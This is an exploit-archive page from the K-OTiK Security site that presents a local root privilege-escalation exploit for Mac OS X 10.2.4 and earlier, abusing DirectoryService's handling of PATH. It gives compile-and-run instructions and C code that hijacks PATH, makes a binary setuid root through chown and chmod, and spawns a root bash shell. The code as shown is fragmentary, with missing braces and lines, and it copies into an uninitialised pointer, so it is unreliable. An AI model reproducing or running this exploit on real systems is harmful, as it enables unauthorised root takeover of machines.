OS X <= 10.2.4 DirectoryService local root PATH exploit

                              * Version TXT Disponible ici *
                              OS X <= 10.2.4 DirectoryService local root PATH exploit
                              DirectoryService must be crashed prior to execution, per
                              @stake advisory.  If you discover how to crash DirectoryService
                              e-mail me at   [Neeko Oni]

                              Assuming DirectoryService has been crashed/killed, compile
                              this code as 'touch' (gcc osxds.c -o touch) and execute.

                              bash$ ./touch
                              *bunch of stuff here*
                              euid is root.



                              main(int argc, char **argv)
                              char           *ORIGPATH;
                              int             temp;
                              if (argc < 2) {
                              if (geteuid() == 0) {
                              printf("euid is root.\n");
                              execl("/bin/bash", "bash", NULL);
                              strcpy(ORIGPATH, getenv("PATH"));
                              printf("Original path: %s\n", ORIGPATH);
                              setenv("PATH", ".", 1);
                              printf("New path: %s\n", getenv("PATH"));
                              printf("Executing DirectoryService with false PATH...\n");
                              if (fork() == 0) {
                              execl("/usr/sbin/DirectoryService", "DirectoryService", NULL);
                              printf("Forked DirectoryService, pausing before shell exec...\n");
                              printf("Cross your fingers.\n");
                              setenv("PATH", ORIGPATH, 1);
                              printf("Path restored: %s\n", getenv("PATH"));
                              execl("./touch", "touch", NULL);            
                              system("/usr/sbin/chown root ./touch;/bin/chmod +s ./touch");



 Audits de Sécurité & Tests Intrusifs F-VNS Security™  Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits